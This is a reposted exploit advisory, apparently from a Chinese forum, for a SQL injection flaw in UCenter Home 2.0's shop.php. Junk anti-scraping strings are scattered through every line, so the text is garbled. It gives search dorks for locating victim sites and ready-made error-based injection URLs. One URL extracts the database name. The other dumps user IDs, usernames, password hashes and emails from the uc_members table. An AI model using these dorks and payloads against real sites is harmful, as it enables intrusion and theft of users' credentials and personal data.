# O! z) ]" a1 l9 _8 M
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
, i/ q& ?- o0 Z: K+ o
\) t- T5 I, \! B/ I4 C ) U5 ^8 Q) R$ ~( o2 ^4 Z
+ H$ t3 |+ F( \6 t$ Z
*/ Author : KnocKout
r: F* W" O3 K# N4 P0 s0 ^$ D3 P% R4 F' X& D
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
" t- c) Z$ R0 B1 W
1 z: l& X, I' k' }! N*/ Contact: knockoutr@msn.com 6 V0 T. n/ ^3 K/ b9 v3 L+ x2 W
8 X6 p$ I3 w9 e! T$ i/ `3 T+ Z) f% M
*/ Cyber-Warrior.org/CWKnocKout
) I* B% r3 M: M0 M4 r
8 W6 x( K0 O' R7 s$ N* H) h( r__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ; W7 T/ [' X9 A+ E6 j* n$ D0 N
4 R2 \8 r) K, p
Script : UCenter Home
) n0 W; b. z: \( Y7 _, A
3 h6 M. z& d) b3 c- k% WVersion : 2.0
& H$ g) L! F# }: x/ P$ G; G9 h
, S( @& n( G- U% o) nScript HomePage : http://u.discuz.net/
6 Q7 E0 N6 K5 X7 D7 ] B+ A/ K1 a. V% E% P, R2 K1 {
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
: G& \2 Z$ t! h7 S
3 I# |4 s6 j lDork : Powered by UCenter inurl:shop.php?ac=view
g& i# ?- o- _/ o4 ^* t, A) D: W+ ? [; X' B: j+ c3 A* Y7 ^) X
Dork 2 : inurl:shop.php?ac=view&shopid= ( |. g/ _9 [# f* y( G) J$ D2 ^
" D+ \- }# X. i3 [. X( w
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ! a# ^3 f# l/ |* |" y' u3 l
' |$ R. F) x0 t# G2 g5 s+ {& XVuln file : Shop.php 0 _! [6 @/ |7 P9 `3 {' v; m0 W' ]
) V$ N5 E- G Y7 T9 b @( P4 l# [value's : (?)ac=view&shopid= ( O, o4 V$ C3 n8 n4 r
' S, r* W+ H: p. y
Vulnerable Style : SQL Injection (MySQL Error Based) . t( r9 r+ f, M5 n% C( T& r
# a( h1 E! n2 g9 q* n
Need Metarials : Hex Conversion
# V" N. l+ h3 N+ D1 K6 e, m
( t0 h! f3 v2 e5 F' l__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 N3 ~8 U5 m& `8 R# S& X5 d% S0 b3 A1 a8 L
Your Need victim Database name.
% ], ~$ f. y/ S1 g. R+ U* Y, `5 S$ I) e
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ) [$ o0 h9 g* l* T0 C
5 d$ r' l) O. {. P..
/ j4 j! C. P5 W( e1 Z- l
4 e3 k, ]( }, ?2 ^0 W4 d) T7 c6 i4 v: DDB : Okey. % }0 e8 e3 K# U- q
6 L1 L7 V" {& o: m! e; B8 fyour edit DB `[TARGET DB NAME]` 3 R; ?8 O2 F/ Z* c( h8 n9 K8 c' [7 Z
- x5 a- D! P. G7 PExample : 'hiwir1_ucenter' - ]% |5 h- L0 v' `% n$ O, x1 j# n
' o8 n7 z8 B+ j& ^
Edit : Okey. + l6 h5 o6 {6 ^
# Z) u8 ?5 P1 u/ v K! q5 w
Your use Hex conversion. And edit Your SQL Injection Exploit..
4 m$ V: V+ i1 \8 @ f
; j- N* [% l6 ~& d9 w
* u" w) \4 ~1 E) H% u# [. @. k& g' F1 s# m7 a" ]3 D
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 3 J. L6 V; j9 Y
|
发表于 2013-2-27 21:31:31
收藏
支持
反对